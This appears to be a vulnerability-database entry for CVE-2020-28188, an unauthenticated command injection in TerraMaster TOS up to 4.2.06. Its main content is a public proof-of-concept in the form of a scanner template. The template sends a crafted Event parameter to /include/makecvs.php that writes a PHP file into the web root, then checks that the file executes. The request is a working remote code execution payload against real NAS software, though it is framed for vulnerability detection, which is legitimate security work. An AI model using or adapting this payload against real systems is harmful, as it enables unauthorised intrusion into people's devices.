漏洞描述
Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.
CVE-2020-28188: TerraMaster TOS Unauthenticated Remote Command Execution
PoC代码[已公开]
id: CVE-2020-28188
info:
name: TerraMaster TOS Unauthenticated Remote Command Execution
author: Print1n
severity: critical
description: |-
Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.
reference:
- https://www.tenable.com/security/research/tra-2020-55
- https://nvd.nist.gov/vuln/detail/CVE-2020-28188
tags: cve,cve2020,terramaster,rce
created: 2023/06/23
set:
r1: randomLowercase(10)
rules:
r0:
request:
method: GET
path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5({{r1}});unlink(__FILE__);?>"%20>>%20/usr/www/{{r1}}.php%20&&%20chmod%20755%20/usr/www/{{r1}}.php||
expression: response.status == 200 && response.content_type.contains("text/csv") && response.body.bcontains(bytes("Service,DateTime"))
r1:
request:
method: GET
path: /{{r1}}.php
expression: response.status == 200 && response.body.bcontains(bytes(md5(r1)))
expression: r0() && r1()